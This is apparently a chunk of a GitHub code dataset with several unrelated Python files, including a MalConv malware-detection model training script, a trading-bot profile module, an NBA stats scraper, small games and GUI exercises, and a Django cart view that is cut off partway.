+{"seq_id":"43876909484","text":"#!/usr/bin/python\n'''defines the MalConv architecture.\nAdapted from https://arxiv.org/pdf/1710.09435.pdf\nThings different about our implementation and that of the original paper:\n * The paper uses batch_size = 256 and SGD(lr=0.01, momentum=0.9, decay=UNDISCLOSED, nesterov=True )\n * The paper didn't have a special EOF symbol\n * The paper allowed for up to 2MB malware sizes, we use 1.0MB because of memory on a Titan X\n '''\n\ndef main(): \n from keras.layers import Dense, Conv1D, Activation, GlobalMaxPooling1D, Input, Embedding, Multiply\n from keras.models import Model\n from keras import backend as K\n from keras import metrics\n import multi_gpu\n import os\n import math\n import random\n import argparse\n import os\n import numpy as np\n import requests\n\n batch_size = 100\n input_dim = 257 # every byte plus a special padding symbol\n padding_char = 256\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpus', help='number of GPUs', default=1)\n\n args = parser.parse_args()\n ngpus = int(args.gpus)\n\n if os.path.exists('malconv.h5'):\n print(\"restoring malconv.h5 from disk for continuation training...\")\n from keras.models import load_model\n basemodel = load_model('malconv.h5')\n _, maxlen, embedding_size = basemodel.layers[1].output_shape\n input_dim\n else:\n maxlen = 2**20 # 1MB\n embedding_size = 8 \n\n # define model structure\n inp = Input( shape=(maxlen,))\n emb = Embedding( input_dim, embedding_size )( inp )\n filt = Conv1D( filters=128, kernel_size=500, strides=500, use_bias=True, activation='relu', padding='valid' )(emb)\n attn = Conv1D( filters=128, kernel_size=500, strides=500, use_bias=True, activation='sigmoid', padding='valid')(emb)\n gated = Multiply()([filt,attn])\n feat = GlobalMaxPooling1D()( gated )\n dense = Dense(128, activation='relu')(feat)\n outp = Dense(1, activation='sigmoid')(dense)\n\n basemodel = Model( inp, outp )\n\n basemodel.summary() \n\n print(\"Using %i GPUs\" %ngpus)\n\n if ngpus > 1:\n model = multi_gpu.make_parallel(basemodel,ngpus)\n else:\n model = basemodel\n\n from keras.optimizers import SGD\n model.compile( loss='binary_crossentropy', optimizer=SGD(lr=0.01,momentum=0.9,nesterov=True,decay=1e-3), metrics=[metrics.binary_accuracy] )\n\n def bytez_to_numpy(bytez,maxlen):\n b = np.ones( (maxlen,), dtype=np.uint16 )*padding_char\n bytez = np.frombuffer( bytez[:maxlen], dtype=np.uint8 )\n b[:len(bytez)] = bytez\n return b\n\n def getfile_service(sha256,url=None,maxlen=maxlen):\n if url is None:\n raise NotImplementedError(\"You must provide your own url for getting file bytez by sha256\")\n r = requests.get( url, params={'sha256':sha256} )\n if not r.ok:\n return None\n return bytez_to_numpy( r.content, maxlen ) \n\n def generator( hashes, labels, batch_size, shuffle=True ):\n X = []\n y = []\n zipped = list(zip(hashes, labels))\n while True:\n if shuffle:\n random.shuffle( zipped )\n for sha256,l in zipped:\n x = getfile_service(sha256)\n if x is None:\n continue\n X.append( x )\n y.append( l )\n if len(X) == batch_size:\n yield np.asarray(X,dtype=np.uint16), np.asarray(y)\n X = []\n y = []\n\n import pandas as pd\n train_labels = pd.read_csv('ember_training.csv.gz')\n train_labels = train_labels[ train_labels['y'] != -1 ] # get only labeled samples\n labels = train_labels['y'].tolist()\n hashes = train_labels['sha256'].tolist()\n\n from sklearn.model_selection import train_test_split\n hashes_train, hashes_val, labels_train, labels_val = train_test_split( hashes, labels, test_size=200 
)\n\n train_gen = generator( hashes_train, labels_train, batch_size )\n val_gen = generator( hashes_val, labels_val, batch_size )\n\n from keras.callbacks import LearningRateScheduler\n\n base = K.get_value( model.optimizer.lr )\n def schedule(epoch):\n return base / 10.0**(epoch//2)\n\n model.fit_generator(\n train_gen,\n steps_per_epoch=len(hashes_train)//batch_size,\n epochs=10,\n validation_data=val_gen,\n callbacks=[ LearningRateScheduler( schedule ) ],\n validation_steps=int(math.ceil(len(hashes_val)/batch_size)),\n )\n\n basemodel.save('malconv.h5')\n\n test_labels = pd.read_csv('ember_test.csv.gz')\n labels_test = test_labels['y'].tolist()\n hashes_test = test_labels['sha256'].tolist()\n\n test_generator = generator(hashes_test,labels_test,batch_size=1,shuffle=False)\n test_p = basemodel.predict_generator( test_generator, steps=len(test_labels), verbose=1 )\n\n\nif __name__ == '__main__':\n print('*'*80)\n print('''\nThis is nonfunctional demonstration code that is provided for convenience. It shows\n- The MalConv structure used in our paper\n- Training procedure used in the paper\n- How to load the weights for the MalConv model that we used.\n\nIt may be made functional by modifying the code to retrieve file contents by sha256\nfrom a user-defined URL.\n\nYou may use the provided weights under the Ember AGPL-3.0 license included in the parent directory.\nWe also ask that you cite the original MalConv paper and refer to the Ember paper as the implementation.\n\n(1) E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, C. Nicholas, \"Malware Detection by Eating a Whole EXE\", in ArXiv e-prints. Oct. 2017.\n\n@ARTICLE{raff2017malware,\n title={Malware detection by eating a whole exe},\n author={Raff, Edward and Barker, Jon and Sylvester, Jared and Brandon, Robert and Catanzaro, Bryan and Nicholas, Charles},\n journal={arXiv preprint arXiv:1710.09435},\n year={2017}\n}\n\n(2) H. Anderson and P. Roth, \"EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models”, in ArXiv e-prints. Apr. 2018.\n\n@ARTICLE{2018arXiv180404637A,\n author = {{Anderson}, H.~S. and {Roth}, P.},\n title = \"{EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models}\",\n journal = {ArXiv e-prints},\n archivePrefix = \"arXiv\",\n eprint = {1804.04637},\n primaryClass = \"cs.CR\",\n keywords = {Computer Science - Cryptography and Security},\n year = 2018,\n month = apr,\n adsurl = {http://adsabs.harvard.edu/abs/2018arXiv180404637A},\n}\n''')\n print('*'*80)\n\n #main() # uncomment this line after fixing the URL NotImplementedError above","repo_name":"elastic/ember","sub_path":"malconv/malconv.py","file_name":"malconv.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":850,"dataset":"github-code","pt":"79"}
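The bytez_to_numpy helper in the MalConv script pads every file to a fixed-length vector with a special padding symbol; the step in isolation, as a tiny runnable sketch (maxlen shrunk to 16 for display):

import numpy as np

def pad_bytes(bytez, maxlen=16, padding_char=256):
    # Fixed-length uint16 vector: raw byte values 0..255, padded with 256.
    out = np.full(maxlen, padding_char, dtype=np.uint16)
    arr = np.frombuffer(bytez[:maxlen], dtype=np.uint8)
    out[:len(arr)] = arr
    return out

print(pad_bytes(b"MZ"))  # [ 77  90 256 256 ... 256]

Using 256 as the pad value is why the embedding has input_dim = 257: one row per byte value plus one for padding.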
+{"seq_id":"74221843775","text":"from collections import deque\n\n\nclass TreeNode:\n\n def __init__(self, value):\n self.value = value\n self.children = []\n\n def __repr__(self):\n return self.value\n\n\ndef print_tree(root):\n\n stack = deque()\n stack.append([root, 0])\n level_str = \"\\n\"\n\n while len(stack) > 0:\n node, level = stack.pop()\n if level > 0 and len(stack) > 0 and level <= stack[-1][1]:\n level_str += \" \"*(level-1) + \"├─\"\n elif level > 0:\n level_str += \" \"*(level-1) + \"└─\"\n level_str += str(node.value)\n level_str += \"\\n\"\n level += 1\n for child in node.children:\n stack.append([child, level])\n\n print(level_str)\n\n\nsample_root_node = TreeNode(\"A\")\ntwo = TreeNode(\"B\")\nthree = TreeNode(\"C\")\nsample_root_node.children = [three, two]\nfour = TreeNode(\"D\")\nfive = TreeNode(\"E\")\nsix = TreeNode(\"F\")\nseven = TreeNode(\"G\")\ntwo.children = [five, four]\nthree.children = [seven, six]\n\n\nprint_tree(sample_root_node)\n","repo_name":"dom-wright/data_structures_algorithms","sub_path":"algorithms/search/tree/tree_print_path.py","file_name":"tree_print_path.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"70417724095","text":"\"\"\"Module for managing the state of a user profile\"\"\"\r\nimport broker\r\nimport db_requests\r\nfrom decimal import Decimal\r\n\r\nfrom sqlite3 import IntegrityError\r\n\r\nimport exchange\r\nfrom custom_types import AssetPrice, Order\r\nimport exceptions\r\n\r\n\r\ndef onboarding(user_id: int) -> bool:\r\n    \"\"\"Onboarding\"\"\"\r\n    try:\r\n        db_requests.insert(\"users\", {\"user_id\": user_id})\r\n        return True\r\n    except IntegrityError:\r\n        return False\r\n\r\n\r\ndef get_balance(user_id: int) -> Decimal:\r\n    \"\"\"Get balance information\"\"\"\r\n    try:\r\n        balance_dict = db_requests.select(\"users\", [\"balance\"], user_id)\r\n        balance = Decimal(balance_dict['balance'])\r\n        return balance\r\n    except KeyError:\r\n        db_requests.insert(\"users\", {\"user_id\": user_id})\r\n        balance = Decimal(0)\r\n        return balance\r\n\r\n\r\ndef get_lots(user_id: int, asset_name: str) -> int:\r\n    try:\r\n        pcs = db_requests.select(\"users\", [asset_name], user_id)[asset_name]\r\n        lots = pcs // AssetPrice.lot_weight.value\r\n        return lots\r\n    except KeyError:\r\n        db_requests.insert(\"users\", {\"user_id\": user_id})\r\n        return 0\r\n\r\n\r\ndef change_balance(user_id: int, money: Decimal) -> Decimal:\r\n    \"\"\"Change the balance\"\"\"\r\n    try:\r\n        balance_dict = db_requests.select(\"users\", [\"balance\"], user_id)\r\n        balance = Decimal(balance_dict['balance'])\r\n        new_balance = balance + money\r\n        db_requests.update_balance(user_id, str(new_balance))\r\n        return new_balance\r\n    except KeyError:\r\n        db_requests.insert(\"users\", {\"user_id\": user_id})\r\n        db_requests.update_balance(user_id, str(money))\r\n        return money\r\n\r\n\r\ndef change_asset_pcs(order: Order, difference: int) -> None:\r\n    \"\"\"Change the number of shares\"\"\"\r\n    try:\r\n        asset_dict = db_requests.select(\"users\", [order.asset_name], order.user_id)\r\n        asset_pcs = asset_dict[order.asset_name]\r\n        new_pcs = asset_pcs + difference\r\n        db_requests.update_asset_pcs(order.user_id, order.asset_name, new_pcs)\r\n        db_requests.update_status(order.order_id)\r\n    except KeyError:\r\n        db_requests.insert(\"users\", {\"user_id\": order.user_id})\r\n        db_requests.update_asset_pcs(order.user_id, order.asset_name, difference)\r\n\r\n\r\ndef get_portfolio(user_id: int) -> dict:\r\n    \"\"\"Get portfolio information\"\"\"\r\n    asset_list = AssetPrice.ASSETS.value\r\n    portfolio = db_requests.select(\"users\", asset_list, user_id)\r\n    if len(portfolio) != 0:\r\n        value = Decimal(0)\r\n        for asset_name in portfolio.keys():\r\n            value += AssetPrice[asset_name].value * portfolio[asset_name]\r\n        portfolio[\"value\"] = value\r\n        return portfolio\r\n    else:\r\n        db_requests.insert(\"users\", {\"user_id\": user_id})\r\n        portfolio = db_requests.select(\"users\", asset_list, user_id)\r\n        portfolio[\"value\"] = Decimal(0)\r\n        return portfolio\r\n\r\n\r\ndef parse_order(order: str) -> dict:\r\n    \"\"\"Parse a request coming from Telegram\"\"\"\r\n    parsed_order = {}\r\n    parsed_request = order.split()\r\n    if len(parsed_request) == 2:\r\n        if parsed_request[0] in AssetPrice.ASSETS.value:\r\n            parsed_order['asset'] = parsed_request[0]\r\n        else:\r\n            raise exceptions.NotCorrectMessage(f\"Invalid format. Check the spelling of the stock name.\\n\"\r\n                                               f\"Available stocks: {' '.join(AssetPrice.ASSETS.value)}\"\r\n                                               )\r\n        try:\r\n            parsed_order['lots'] = int(parsed_request[1])\r\n        except ValueError:\r\n            raise exceptions.NotCorrectMessage(\"Invalid format. Check the number of lots.\")\r\n        if parsed_order['lots'] <= 0:\r\n            raise exceptions.NotCorrectMessage(f\"Invalid format. Check the number of lots.\\n\"\r\n                                               f\"The number must be greater than 0\"\r\n                                               )\r\n        return parsed_order\r\n    else:\r\n        raise exceptions.NotCorrectMessage(f\"Invalid format. Check the command syntax.\\n\"\r\n                                           f\"Commands:\\n\"\r\n                                           f\"/buy asset lots\\n\"\r\n                                           f\"/sell asset lots\\n\"\r\n                                           f\"where asset is the asset name and lots is the number of lots (1 lot = 10 pcs.)\"\r\n                                           )\r\n\r\n\r\ndef sell_assets(order: Order) -> bool:\r\n    \"\"\"Create an order to sell shares\"\"\"\r\n    lots = get_lots(order.user_id, order.asset_name)\r\n    if broker.check_assets(order, lots):\r\n        broker.create_sell_order(order)\r\n        exchange.close_the_deal(order)\r\n    else:\r\n        raise exceptions.BrokerException(f\"Not enough shares.\\n\"\r\n                                         f\"Buy share lots first: /buy {order.asset_name} {order.lots}\")\r\n    return True\r\n\r\n\r\ndef buy_assets(order: Order) -> bool:\r\n    \"\"\"Create an order to buy shares\"\"\"\r\n    balance = get_balance(order.user_id)\r\n    if broker.check_balance(order, balance):\r\n        broker.create_buy_order(order)\r\n        exchange.close_the_deal(order)\r\n    else:\r\n        raise exceptions.BrokerException(f\"Not enough funds.\\n\"\r\n                                         f\"Top up your balance with: /change_balance {order.price}\")\r\n    return True\r\n\r\n\r\ndef get_my_orders(user_id: int) -> str:\r\n    \"\"\"Get all orders for a profile by id\"\"\"\r\n    my_orders = db_requests.fetchall_by_id(\"reg_orders\", [\"type\", \"asset\", \"price\", \"status\", \"date\"],\r\n                                           user_id)\r\n    message = ''\r\n    if len(my_orders) == 0:\r\n        message = 'The profile has no orders'\r\n        return message\r\n    else:\r\n        for row in my_orders:\r\n            for key in row.keys():\r\n                message += str(row[key]) + ' '\r\n            message += '\\n'\r\n        return message\r\n","repo_name":"yaroslavcherkaev/sbercontest","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
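The balance helpers above store money as Decimal rather than float; a two-line illustration of why that matters for currency math:

from decimal import Decimal

print(0.1 + 0.2)                        # 0.30000000000000004
print(Decimal("0.1") + Decimal("0.2"))  # 0.3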
+{"seq_id":"50450438273","text":"import httplib2\nfrom apiclient import discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport settings\n\nhttpAuth = settings.credentials.authorize(httplib2.Http())\nservice = discovery.build('sheets', 'v4', http=httpAuth)\n\nres = service.spreadsheets().values().batchUpdate(\n spreadsheetId=settings.spreadsheetId,\n body={\n 'valueInputOption': 'USER_ENTERED',\n 'data': [\n {\n 'range': 'First list!B2:D5',\n 'majorDimension': 'ROWS',\n 'values': [\n ['Test B', 'Test C', 'Test D'],\n ['24', '5', '=B3/C3']\n ]\n }\n ]\n }\n).execute()\n","repo_name":"TRTSS/SteamParserV1","sub_path":"editSheet.py","file_name":"editSheet.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
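The mirror-image read of the same range, sketched as a continuation of the script above (it reuses the service and settings objects already built there; the range string is assumed to match):

result = service.spreadsheets().values().get(
    spreadsheetId=settings.spreadsheetId,
    range='First list!B2:D5',
    majorDimension='ROWS',
).execute()
print(result.get('values', []))  # rows as lists of cell strings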
+{"seq_id":"70965751616","text":"import string\nfrom nltk.corpus import stopwords\nfrom collections import Counter\n\ndef strip_punct(s):\n while True:\n if s:\n if s[-1] in string.punctuation: s = s[:-1]\n elif s[0] in string.punctuation: s = s[1:]\n else: return s\n else: return ''\n\n\ndef add_space(s):\n if not s: return ''\n result = s[0]\n prev_c = s[0]\n for c in s[1:]:\n if prev_c in string.punctuation:\n result += ' '\n result += c\n else:\n if c in string.punctuation:\n result += ' '\n result += c\n else:\n result += c\n prev_c = c\n result = ' '.join(result.split())\n return result\n\n\ndef normalize_phrase(phrase, subq_config, ignore=[]):\n # Rule 1: split composite mentions based on 'and'\n if subq_config['split_composite_mention']:\n phrases = [p.strip() for p in phrase.split(' and ')]\n else:\n phrases = [phrase.strip()]\n\n # Rule 2: remove punctuations\n if subq_config['remove_punctuation']:\n phrases = [strip_punct(p).strip() for p in phrases if strip_punct(p).strip() != '']\n \n # Rule 3: remove lowercase phrases\n if subq_config['remove_lowercase_phrase']:\n phrases = [p for p in phrases if p != p.lower()]\n\n # Rule 4: remove the def 'the'\n if subq_config['remove_the']:\n phrases = [' '.join(p.split()[1:]) if p.split()[0].lower() == 'the' else p for p in phrases]\n\n # Rule 5: remove short phrase\n phrases = [p for p in phrases if len(p) >= subq_config['min_phrase_length']]\n \n # Rule 6: remove stopword\n if subq_config['remove_stopword']:\n phrases = [p for p in phrases if p.lower() not in stopwords.words('english')]\n \n # Rule 7: remove subtype\n if subq_config['remove_subtype']:\n phrases = [p for p in phrases if p.lower() not in ignore]\n \n # find the start positions of phrases\n if len(phrases) > 0:\n starts = [phrase.find(p) for p in phrases]\n else:\n starts = None\n\n return phrases, starts\n\n\ndef postproc_retrieved_data(retrieved_data, nlp, subq_config, ignore=[]):\n # This code normalizes retrieved phrases, detects abbreviations, and merges duplicate sentences\n \n processed_data = {}\n\n for json_example in retrieved_data:\n sent = json_example['sentence']\n pos = json_example['pos']\n phrase = json_example['phrase']\n\n if sent not in processed_data.keys():\n processed_data[sent] = {\n 'sentence': sent,\n 'poss': [pos],\n 'phrases': [phrase]\n }\n else :\n processed_data[sent]['poss'].append(pos)\n processed_data[sent]['phrases'].append(phrase)\n\n for sent in processed_data.keys():\n json_example = processed_data[sent]\n \n abbreviations = {}\n doc = nlp(json_example['sentence'])\n for abrv in doc._.abbreviations:\n if abrv.text.lower() not in ignore :\n abbreviations[abrv._.long_form.text] = [abrv.text, (abrv.start_char, abrv.end_char)]\n\n processed_data[sent]['abbreviations'] = abbreviations\n\n phrases = []\n pos_mark = [0 for _ in range(len(json_example['sentence']))]\n for phrase, pos in zip(json_example['phrases'], json_example['poss']):\n normalized_names, starts = normalize_phrase(phrase, subq_config, ignore)\n\n if normalized_names == []:\n pass\n else:\n # If there are conflicts between spans within duplicate sentences, the higher-ranked span is selected.\n for nn, st in zip(normalized_names, starts):\n start_idx = pos[0] + st\n\n if nn != json_example['sentence'][start_idx:start_idx+len(nn)]:\n continue\n\n if sum(pos_mark[start_idx:start_idx+len(nn)]) == 0:\n phrases.append({\n 'name': nn,\n 'start': start_idx,\n 'end': start_idx+len(nn)\n })\n\n for i in range(start_idx, start_idx+len(nn)):\n pos_mark[i] = 1\n \n 
processed_data[sent]['phrases'] = phrases\n del processed_data[sent]['poss']\n \n return processed_data\n\n\ndef preproc_dictionary(dictionary, min_phrase_frequency=0, lowercase_matching=True):\n # This code pre-processes a raw pseudo-dictionary for dictionary matching.\n type_counter = {}\n\n phrases = [p.split(\"\\t\")[0].strip() for p in dictionary]\n\n # add spaces before and after punctuations\n phrases = [add_space(p) for p in phrases]\n\n if lowercase_matching:\n phrases = [p.lower() for p in phrases]\n\n # type of dictionary\n t = dictionary[0].split('\\t')[1].strip()\n for p in phrases:\n if p not in type_counter.keys(): type_counter[p] = Counter()\n type_counter[p][t] += 1\n\n # Remove duplicates\n phrases = list(set(phrases))\n\n processed_phrases = []\n\n cnt = 0\n for p in phrases:\n if max(type_counter[p].values()) > min_phrase_frequency:\n processed_phrases.append(p)\n cnt += 1\n\n return processed_phrases, type_counter\n\n\n","repo_name":"dmis-lab/GeNER","sub_path":"utils/norm_utils.py","file_name":"norm_utils.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"79"}
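A quick usage check of the two string helpers defined at the top of norm_utils.py, run inside the same module:

print(strip_punct('"anemia,"'))                 # anemia
print(add_space('BRCA1-mutated, early-onset'))  # BRCA1 - mutated , early - onset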
+{"seq_id":"16370360314","text":"\"\"\"In Chapter 4 there was a problem that asked you to write a program that lets the user play\nRock-Paper-Scissors against the computer. In that program there were exactly five rounds.\nRewrite the program so that it is a best 3 out of 5. That is, the first player to win three times is\nthe winner.\n\"\"\"\n\nimport random\n\nchoices = ['scissors', 'rock', 'paper']\n\nyou_win = 0\ncomputer_win = 0\nround_num = 1\n\n# play until someone reaches three wins; tied rounds do not count toward either total\nwhile you_win < 3 and computer_win < 3:\n    computer = random.choice(choices)\n    print(\"round\", round_num, \":\")\n    yourturn = input(\"let's play: \")\n\n    while yourturn not in choices:\n        yourturn = input(\"oops! play again: \")\n\n    print(\"computer choice:\", computer)\n    if yourturn == computer:\n        print(\"no one wins this round\")\n    elif ((yourturn == choices[0] and computer == choices[2]) or\n          (yourturn == choices[1] and computer == choices[0]) or\n          (yourturn == choices[2] and computer == choices[1])):\n        you_win += 1\n        print(\"you win this round\")\n    else:\n        computer_win += 1\n        print(\"you lose this round\")\n\n    round_num += 1\n\nprint(\"Final:\")\nif you_win == 3:\n    print(\"you WIN :)\")\nelse:\n    print(\"you LOSE :(\")\n","repo_name":"monkeybuzinis/Python","sub_path":"9.while loop/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"}
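The chained win conditions can also be collapsed into a lookup table; a standalone sketch:

BEATS = {'rock': 'scissors', 'paper': 'rock', 'scissors': 'paper'}

def round_result(you, computer):
    # Returns 'tie', 'win' or 'lose' from the player's point of view.
    if you == computer:
        return 'tie'
    return 'win' if BEATS[you] == computer else 'lose'

print(round_result('rock', 'scissors'))  # win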
+{"seq_id":"6294152925","text":"# Build a table from the NBA player rankings at stats.nba.com\n# Uses pandas, beautifulsoup4 and selenium\n# Basic web scraping practice.\n\n# Libraries\nimport time\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport json\n\n# navigate to the site\nurl = \"https://stats.nba.com/players/traditional/?SeasonType=Playoffs&sort=PLAYER_NAME&dir=1\"\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get(url)\ntime.sleep(3)\n\n# accept the site's cookie popup\npopup = driver.find_element_by_xpath(\"//button[@id='onetrust-accept-btn-handler']\")\nif popup:\n    popup.click()\n# categories to sort by\ntop10ranking = {}\nrankings = {\n    '3points': {'field': 'FG3M', 'label': '3PM'},\n    'points': {'field': 'PTS', 'label': 'PTS'},\n    'assistants': {'field': 'AST', 'label': 'AST'},\n    'rebounds': {'field': 'REB', 'label': 'REB'},\n    'steals': {'field': 'STL', 'label': 'STL'},\n    'blocks': {'field': 'BLK', 'label': 'BLK'},\n}\n\n# builds the top-10 table for one ranking category\ndef buildrank(type):\n    field = rankings[type]['field']\n    label = rankings[type]['label']\n\n    driver.find_element_by_xpath(f\"//div[@class='nba-stat-table']//table//thead//tr//th[@data-field='{field}']\").click()\n    element = driver.find_element_by_xpath(\"//div[@class='nba-stat-table']//table\")\n    html_content = element.get_attribute('outerHTML')\n    # Parse the content with BeautifulSoup\n    soup = BeautifulSoup(html_content, 'html.parser')\n    table = soup.find(name='table')\n    # Structure it with pandas\n    df_full = pd.read_html(str(table))[0].head(10)\n    df = df_full[[\"Unnamed: 0\", \"PLAYER\", \"TEAM\", label]]\n    df.columns = ['pos', 'player', 'team', 'total']\n    # Turn the data into a plain dict\n    return df.to_dict('records')\n\nfor i in rankings:\n    top10ranking[i] = buildrank(i)\n\n# close the browser\ndriver.quit()\n\n# Convert and save to a JSON file\njs = json.dumps(top10ranking)\nfp = open('ranking.json', 'w')\nfp.write(js)\nfp.close()","repo_name":"RaphaelR89/Webscrapping","sub_path":"NBAranking/nbaranking.py","file_name":"nbaranking.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
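The pandas step in isolation, on a hypothetical HTML fragment (pd.read_html needs an HTML parser such as lxml installed):

from io import StringIO
import pandas as pd

html = ("<table><thead><tr><th>PLAYER</th><th>PTS</th></tr></thead>"
        "<tbody><tr><td>A. Player</td><td>30</td></tr></tbody></table>")
df = pd.read_html(StringIO(html))[0]
print(df.columns.tolist())  # ['PLAYER', 'PTS']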
+{"seq_id":"24113606082","text":"from tkinter import *\n\nmain_window = Tk()\nmain_window.title('Food Calculator')\nmain_window.geometry('300x200')\nmain_window.resizable(width=FALSE, height=FALSE)\nmain_window_bg_colour = 'gray77' # Set this as a variable that can be used across the code\nmain_window.configure(bg=main_window_bg_colour)\n\n\nmain_label = Label(main_window, text=\"Choose your fruit\")\nmain_label.place(relx=0.5, y=15, anchor=CENTER)\nmain_label.configure(bg=main_window_bg_colour)\n\nradio_button_variable = IntVar() # Define variable as integer\nprice_result = IntVar() # Define variable as integer\n\n\ndef calculate_price():\n radio_button_value = int(radio_button_variable.get()) # Make sure this variable is an integer\n input_weight_value = int(input_weight_entry.get()) # Make sure this variable is an integer\n price = radio_button_value * input_weight_value # Make the calculations and assign the value to a variable\n price_result.set(price) # Set the \"price_result\" variable as the value of the \"price\" variable\n\n # price_result.set(int(radio_button_variable.get()) * int(input_weight_entry.get())) # Same as the above in one line\n\n\nradio_button_apple = Radiobutton(main_window, text=\"Apple\", variable=radio_button_variable, value=10)\nradio_button_apple.place(x=5, y=40)\nradio_button_apple.configure(bg=main_window_bg_colour)\n\nradio_button_banana = Radiobutton(main_window, text=\"Banana\", variable=radio_button_variable, value=11)\nradio_button_banana.place(x=5, y=60)\nradio_button_banana.configure(bg=main_window_bg_colour)\n\nradio_button_orange = Radiobutton(main_window, text=\"Grapes\", variable=radio_button_variable, value=15)\nradio_button_orange.place(x=5, y=80)\nradio_button_orange.configure(bg=main_window_bg_colour)\n\nradio_button_apple = Radiobutton(main_window, text=\"Kiwi\", variable=radio_button_variable, value=12)\nradio_button_apple.place(x=100, y=40)\nradio_button_apple.configure(bg=main_window_bg_colour)\n\nradio_button_banana = Radiobutton(main_window, text=\"Pear\", variable=radio_button_variable, value=8)\nradio_button_banana.place(x=100, y=60)\nradio_button_banana.configure(bg=main_window_bg_colour)\n\nradio_button_orange = Radiobutton(main_window, text=\"Orange\", variable=radio_button_variable, value=5)\nradio_button_orange.place(x=100, y=80)\nradio_button_orange.configure(bg=main_window_bg_colour)\n\n\ninput_weight_entry = Entry(main_window, width=10) # Set this variable as an \"entry\" type one in the window called \"main_window\"\ninput_weight_entry.place(x=100, y=130)\n\ninput_weight_entry_label = Label(main_window, text=\"Weight (kg): \")\ninput_weight_entry_label.place(x=5, y=132)\ninput_weight_entry_label.configure(bg=main_window_bg_colour)\n\ncalculate_price_entry = Entry(main_window, width=10, textvariable=price_result) # Output the \"price_result\" variable value\ncalculate_price_entry.place(x=100, y=160)\n\ncalculate_price_button = Button(main_window, text='Calc', command= lambda : calculate_price()) # When clicked run the \"calculate_price\" function\ncalculate_price_button.place(x=50, y=162)\ncalculate_price_button.configure(highlightbackground=main_window_bg_colour)\n\nmain_window.mainloop()","repo_name":"TheFREAK69/Udemy-Master_Tkinter_By_Building_5_Fully_Functioning_Apps","sub_path":"Project 1 - Food Calculator.py","file_name":"Project 1 - Food Calculator.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39711700128","text":"# -*- coding: utf-8 -*-\nimport time\n\nfrom selenium import webdriver\n\nfrom share import unittest123321\n\n\nclass WebdriverDemo(unittest123321.TestCase):\n    def setUp(self):\n        self.driver = webdriver.Firefox()\n        self.driver.implicitly_wait(30)\n        self.base_url = \"http://test.paymax.cc\"\n        self.verificationErrors = []\n        self.accept_next_alert = True\n\n    def test_webdriver_demo(self):\n        driver = self.driver\n        driver.maximize_window()\n\n        # visit the URL\n        driver.get(self.base_url + \"/\")\n        # locate via a CSS selector:\n        # driver.find_element_by_css_selector(\"a[class='button blue cta']\").click()\n        # locate via an XPath expression\n        # driver.find_element_by_xpath(\".//*[@id='bgstylec']/div[2]/div/p/a\").click()\n        # driver.find_element_by_css_selector(\"button[class='btn btn-primary none']\").click()  # log in\n        driver.find_element_by_css_selector(\"button[class='btn btn-success']\").click()\n\n        time.sleep(3)\n\n    def close_alert_and_get_its_text(self):\n        try:\n            alert = self.driver.switch_to.alert\n            alert_text = alert.text\n            if self.accept_next_alert:\n                alert.accept()\n            else:\n                alert.dismiss()\n            return alert_text\n        finally:\n            self.accept_next_alert = True\n\n    def tearDown(self):\n        self.driver.quit()\n        self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n    unittest123321.main()","repo_name":"hivencent/paymax-test","sub_path":"demo/share_2_front_end.py","file_name":"share_2_front_end.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
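Selenium also offers explicit waits, which are usually more robust than the implicit wait plus time.sleep used above; a sketch against a driver like the one created in setUp (the locator is hypothetical):

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# Wait up to 30 s for this specific element instead of sleeping a fixed time.
button = WebDriverWait(driver, 30).until(
    EC.element_to_be_clickable((By.CSS_SELECTOR, "button.btn.btn-success"))
)
button.click()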
+{"seq_id":"31568591310","text":"from django.shortcuts import render, redirect\nfrom orders.forms import PizzaForm, SubForm, PastaForm, SaladForm, DinnerPlatterForm\nfrom orders.models import Pizza, Sub, Pasta, Salad, DinnerPlatter\nfrom cart.models import CartItem, OrderItem\nfrom django.db.models import Sum\nfrom decimal import Decimal\n\n\n# Create your views here.\ndef cart(request):\n if request.method == \"POST\":\n if request.POST['menu_item'] == 'Pizza':\n form = PizzaForm(request.POST)\n\n if form.is_valid():\n form = form.cleaned_data\n # Get the form data to build a Pizza and CartItem\n menu = \"Pizza\"\n style = form['style']\n size = form['size']\n is_special = False\n if 'is_special' in request.POST:\n is_special = True\n num_toppings = form['num_toppings']\n topping_list = []\n for topping in form['toppings']:\n topping_list.append(str(topping))\n toppings = \", \".join(topping_list)\n\n # Lookup price\n if is_special:\n # numtoppings doesn't matter\n menu_pizza = Pizza.objects.get(style=style, size=size, is_special=is_special)\n else:\n menu_pizza = Pizza.objects.get(style=style, size=size, num_toppings=num_toppings, is_special=is_special)\n price = menu_pizza.price\n print(price)\n\n # Create the Cart Item\n order = CartItem(menu=menu, size=size, style=style, additional=toppings, is_special=is_special, user_id=request.user.id, price=price)\n 